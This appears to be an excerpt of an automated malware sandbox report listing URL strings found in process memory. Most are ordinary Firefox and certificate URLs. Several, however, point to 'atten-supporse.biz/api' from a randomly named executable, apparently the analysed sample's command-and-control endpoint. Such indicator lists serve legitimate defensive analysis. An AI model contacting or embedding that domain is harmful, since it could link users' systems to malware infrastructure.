Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF705F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2728904832.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2812300663.000001DEF05CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2729546937.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF6930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3047167053.000001DEEC13C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC962000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756065289.000001DEF6A89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756197782.000001DEF6AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2847420090.000001DEF6AAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2833254348.000001DEF0316000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2920506033.000001DEF124C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755005207.000001DEF702A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057071342.000001DEEC977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001C.00000003.2923613146.000001DEF11C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulJ
Source: firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.sessionstore.upgradeBackup.maxU
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/parent/ext-
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulcreateNotificationMessageElement/setAle
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 0000001F.00000003.2739221096.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2738035698.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2970101056.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.videolan.org/x264.html
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/autocomplete-richlistitem
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001C.00000003.2904698358.000001DEF249F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF7083000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057721005.000001DEECA28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads-us.rd.linksynergy.com/as.php
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573323312.00000000012B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/L
Source: a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678528544.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656607404.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/ac
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656804081.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656627484.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api3Co
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2961232201.00000000012CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiPC
Source: a6f0d09f38.exe, 0000000D.00000003.2656627484.00000000012B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apibV7Ryd
Source: a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
Source: a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiH
